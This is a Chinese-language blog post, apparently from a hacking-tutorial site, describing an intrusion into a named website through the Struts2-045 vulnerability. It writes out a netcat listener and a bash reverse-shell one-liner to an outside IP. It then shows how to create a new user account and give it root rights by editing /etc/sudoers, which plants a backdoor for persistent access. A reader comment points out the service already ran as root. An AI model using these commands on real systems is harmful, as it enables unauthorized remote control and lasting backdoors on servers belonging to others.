记一次初步 Linux 提权

释放双眼,带上耳机,听听看~!

前言

提权这么久了  还是头一次提下Linux的服务器…

由于之前一直钻研的win服务器  要不是前些日子爆出来Struts2-045漏洞

估计还没时间接触Linux提权….

 

正文

st2漏洞页面

http://www.dainar.com/index.action

可以看到是root权限的

接着就是想办法添加一个root组的用户

由于添加用户需要两次重复输入密码(不像win服务器直接net user)

所以nc反弹一个shell到外网服务器上

nc -vv -l -p 2333

在st2工具里输入

bash -i >& /dev/tcp/10.0.0.1/2333 0>&1

10.0.0.1是你的外网ip  2333是你监听的端口

然后执行反弹 成功反弹上来后

添加用户

用adduser命令添加一个普通用户,命令如下:
#adduser sf197  //添加一个名为sf197的用户
#passwd sf197   //修改密码
Changing password for user sf197.
New UNIX password:     //在这里输入新密码
Retype new UNIX password:  //再次输入新密码
passwd: all authentication tokens updated successfully.//建立成功。

添加用户到root组

方法一:修改 /etc/sudoers 文件,找到下面一行,把前面的注释(#)去掉
## Allows people in group wheel to run all commands
%wheel    ALL=(ALL)    ALL
然后修改用户,使其属于root组(wheel),命令如下:
#usermod -g root sf197
修改完毕,现在可以用sf197帐号登录,然后用命令 su – ,即可获得root权限进行操作。

方法二:修改 /etc/sudoers 文件,找到下面一行,在root下面添加一行,如下所示:
## Allow root to run any commands anywhere
root    ALL=(ALL)     ALL
sf197   ALL=(ALL)     ALL
修改完毕,现在可以用sf197帐号登录,然后用命令 su – ,即可获得root权限进行操作。

成功添加完毕

用ssh协议连接服务器  执行id返回root组!

 

渗透教程

Metasploit 下 Windows 下多种提权方式

2020-6-15 20:05:13

渗透教程质量好文

SQL Server 提权系列

2020-6-15 21:05:21

2 条回复 A文章作者 M管理员
  1. 这不本身就是root权限吗,还提什么?
    = =

个人中心
购物车
优惠劵
有新私信 私信列表
搜索